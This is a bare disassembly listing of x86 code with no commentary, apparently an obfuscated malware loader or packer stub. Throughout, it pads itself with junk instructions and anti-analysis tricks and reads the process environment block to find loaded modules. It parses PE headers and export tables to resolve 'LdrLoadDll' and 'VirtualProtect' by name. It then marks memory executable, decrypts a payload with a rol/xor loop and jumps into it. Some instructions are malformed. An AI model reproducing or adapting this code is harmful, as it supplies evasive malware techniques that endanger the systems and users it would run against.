_start
pushad
sub esp 0x4
mov [ esp ] edx
xor edx [ esp ]
add esp 0x4
push esp
test edx edx
sbb edx 0xffffffff
mov edi [ esp ]
add esp 0x4
inc edx
and eax eax
sbb edi 0x4
inc edx
neg edx
call $+5
sub [ edi ] edx
retn
sub_11002036
mov eax 0x0
sub eax 0x0
neg eax
sub ebx ebx
add ebx eax
and edi 0x0
add edi eax
stc
sbb bx 0x0
add bl 0xff
mov bh bl
call $+5
add [ esp ] eax
jmp [ esp ]
and eax 0x0
or eax edi
add edi 0x1
xor ecx ecx
xor ecx [ esp ]
movzx esi [ ecx + edi - 0x2 ]
call $+5
mov [ esp ] esi
sub esi ebx
pop esi
jne r-xdata
mov [ ecx ] 0xc33c931
and al 0xf
mov bh 0x74
cmp esi edi
sub_110020be
push [ fs : 0x0 ]
and eax eax
adc ecx edi
xor ebx ebx
add ebx 0xffff
not eax
or ecx ecx
adc ecx edi
mov [ fs : 0x0 ] esp
and ecx eax
or edx edx
adc ecx edi
and esi esi
jno r-xdata
call $+5
sub ecx edi
sub esp 0x4
mov [ esp ] edx
xor edx [ esp ]
or ecx ecx
adc esp 0x4
mov edx [ ecx ]
and esi 0x0
add esi 0x5a4d
and edx ebx
cmp edx esi
je r-xdata
call sub_110020be
add esp 0xfffffffc
mov [ esp ] eax
xor eax eax
xor eax [ esp + 0x10 ]
test edi edi
adc [ eax + 0xb8 ] 0x1
or eax eax
sbb [ eax + 0xb8 ] 0xffffffff
add esp 0x4
mov eax [ esp - 0x4 ]
xor eax eax
retn 0x10
mov edx [ esp ]
add esp 0x4
mov edx 0x0
or edx [ esp ]
mov [ fs : 0x0 ] edx
add esp 0x8
mov edi 0x0
xor edi ecx
mov edx 0x0
sub edx [ ecx + 0x3c ]
neg edx
add ecx edx
mov edx 0x4550
sub esi esi
add esi [ ecx ]
call $+5
mov [ esp ] esi
sub esi edx
pop esi
jne r-xdata
jmp [ esp ]
popad
mov eax 0x0
or eax 0x1
retn 0xc
mov edx 0x0
sub edx [ ecx + 0x78 ]
neg edx
mov ecx 0x0
xor ecx edx
and edx edx
adc ecx edi
add esp 0xfffffffc
mov [ esp ] ecx
mov edx 0x0
sub edx [ ecx + 0x20 ]
neg edx
test eax eax
mov ecx 0x0
adc ecx edx
test edx edx
adc ecx edi
push edi
push ecx
mov esi [ esp ]
add esp 0x4
mov ebx [ esp ]
add esp 0x4
call $+5
mov [ esp ] edx
xor edx [ esp ]
or edi edi
sbb esp 0xfffffffc
mov eax 0x0
or eax esi
push [ esi ]
pop ecx
mov esi 0x0
add esi ecx
call $+5
mov ebp 0x0
xor ebp esp
test edx edx
adc esi ebx
add esp 0xfffffffc
mov [ esp ] 0x6c6c
call $+5
mov [ esp ] 0x4464616f
call $+5
mov [ esp ] 0x4c72644c
xor edi edi
xor edi esp
mov ecx 0x0
or ecx 0xb
[ esi ] [ edi ]
je r-xdata
and esp 0x0
add esp ebp
mov esi [ esp ]
add esp 0x4
sub esp 0x4
mov [ esp ] ebx
push edx
pop eax
mov edi [ esp ]
add esp 0x4
mov ecx [ esp ]
add esp 0x4
push ecx
pop ebx
or edi edi
mov edx 0x0
adc edx [ ecx + 0x24 ]
and ecx 0x0
or ecx edx
add ecx edi
xor edx edx
or edx [ ecx + eax * 2 ]
and edx 0xffff
or edi edi
mov eax 0x0
adc eax edx
push [ ebx + 0x10 ]
pop edx
or edx edx
sbb eax edx
test ecx ecx
adc eax 0x1
or edi edi
mov ecx 0x0
adc ecx [ ebx + 0x1c ]
and edi edi
adc ecx edi
test esi esi
mov edx 0x0
adc edx [ ecx + eax * 4 ]
add edi edx
and ebp 0x0
or ebp esp
xor edx edx
push edx
sub ecx ecx
add ecx esp
call $+5
mov [ esp ] edx
sub esp 0x4
mov [ esp ] 0x6c006c
add esp 0xfffffffc
mov [ esp ] 0x64002e
add esp 0xfffffffc
mov [ esp ] 0x320033
add esp 0xfffffffc
mov [ esp ] 0x6c0065
add esp 0xfffffffc
mov [ esp ] 0x6e0072
sub esp 0x4
mov [ esp ] 0x65006b
push esp
call $+5
mov [ esp ] 0x1a0018
mov esi 0x0
or esi esp
call $+5
mov [ esp ] ecx
call $+5
mov [ esp ] esi
add esp 0xfffffffc
mov [ esp ] edx
sub esp 0x4
mov [ esp ] edx
sub esp 0x4
mov [ esp ] edi
call $+5
mov [ esp ] ecx
add esp 0x4
mov esi [ esp - 0x4 ]
pop ebx
call ebx
and eax 0x0
or eax [ esi ]
add esp 0xfffffffc
mov [ esp ] eax
pop edx
and esi 0x0
add esi [ fs : 0x30 ]
xor edi edi
or edi [ esi + 0x10 ]
mov [ edi + 0x18 ] edx
sub esp esp
add esp ebp
xor esi esi
add esi [ fs : 0x30 ]
mov edi 0x0
or edi [ esi + 0x10 ]
mov ecx 0x0
add ecx [ edi + 0x18 ]
mov edi 0x0
add edi ecx
mov edx 0x0
or edx [ ecx + 0x3c ]
or ebx ebx
adc ecx edx
or eax eax
mov edx 0x0
adc edx [ ecx + 0x78 ]
mov ecx 0x0
xor ecx edx
test edx edx
adc ecx edi
push ecx
mov edx 0x0
xor edx [ ecx + 0x20 ]
mov ecx 0x0
sub ecx edx
neg ecx
or edx edx
adc ecx edi
call $+5
mov [ esp ] edi
add esp 0xfffffffc
mov [ esp ] ecx
pop esi
mov ebx [ esp ]
add esp 0x4
add esp 0xfffffffc
mov [ esp ] edx
xor edx [ esp ]
and edi edi
adc esp 0x4
xor eax eax
xor eax esi
sub ecx ecx
add ecx [ esi ]
push ecx
pop esi
call $+5
mov ebp 0x0
or ebp esp
test edx edx
adc esi ebx
add esp 0xfffffffc
mov [ esp ] 0x7463
add esp 0xfffffffc
mov [ esp ] 0x65746f72
push 0x506c6175
push 0x74726956
push esp
pop edi
and ecx 0x0
or ecx 0xf
[ esi ] [ edi ]
je r-xdata
test ebx ebx
adc edx 0x1
add eax 0x4
xor esi esi
xor esi [ eax ]
mov esp 0x0
or esp ebp
jmp [ esp ]
and esp 0x0
or esp ebp
add esp 0x4
mov esi [ esp - 0x4 ]
push ebx
sub esp 0x4
mov [ esp ] edx
pop eax
add esp 0x4
mov edi [ esp - 0x4 ]
mov ecx [ esp ]
add esp 0x4
mov ebx 0x0
or ebx ecx
mov edx 0x0
add edx [ ecx + 0x24 ]
mov ecx 0x0
or ecx edx
and ecx ecx
adc ecx edi
and edx 0x0
or edx [ ecx + eax * 2 ]
and edx 0xffff
mov eax 0x0
add eax edx
mov edx 0x0
sub edx [ ebx + 0x10 ]
neg edx
sub eax edx
inc eax
and ecx 0x0
or ecx [ ebx + 0x1c ]
and esi esi
adc ecx edi
mov edx 0x0
xor edx [ ecx + eax * 4 ]
add edi edx
mov ebx 0x0
sub ebx 0x1000
neg ebx
call $+5
mov ecx [ esp ]
add esp 0x4
and ecx 0xfffff000
and eax eax
adc ecx ebx
or ebx ebx
adc ecx ebx
add esp 0xfffffffc
mov [ esp ] ecx
mov esi 0x0
sub esi 0x4
neg esi
call $+5
or edi edi
adc ecx ebx
mov edx 0x0
xor edx [ ecx ]
stc
sbb esi 0x0
je r-xdata
add edx 0x1
add eax 0x4
mov esi 0x0
add esi [ eax ]
xor esp esp
xor esp ebp
jmp [ esp ]
pop edx
add esp 0x4
mov ecx [ esp - 0x4 ]
add esp 0xfffffffc
mov [ esp ] edx
push esp
add esp 0xfffffffc
mov [ esp ] 0x40
sub esp 0x4
mov [ esp ] 0x4593
push ecx
sub esp 0x4
mov [ esp ] edi
call $+5
mov [ esp ] ecx
mov esi [ esp ]
add esp 0x4
pop ebx
call $+5
pop eax
and eax eax
adc eax 0x19
sub esp 0x4
mov [ esp ] eax
push ebp
mov ebp 0x0
add ebp esp
add ebx 0x5
jmp ebx
jmp [ esp ]
sub_1100254c
add esp 0x4
mov ebx [ esp - 0x4 ]
xor edi edi
or edi esi
and eax 0x0
add eax 0xc
add edi eax
or edi edi
mov esi 0x0
adc esi edi
xor ebp ebp
add ebp edi
xor ecx ecx
xor ecx 0x44f1
mov edx ecx
call $+5
inc esi
pop ecx
dec ecx
je r-xdata
stosb [ edi ]
pop eax
call ebp
or ebx ebx
adc eax ebx
add ecx edx
popad
mov eax 0x0
or eax 0x1
retn 0xc
jmp [ esp ]
mov eax 0x0
xor eax [ esi ]
rol al cl
xor eax edx
sub esp 0x4
mov [ esp ] ecx
mov ecx 0x0
or ecx 0x40
add esp 0xfffffffc
mov [ esp ] ebx
sub ebx ecx
pop ebx
je r-xdata
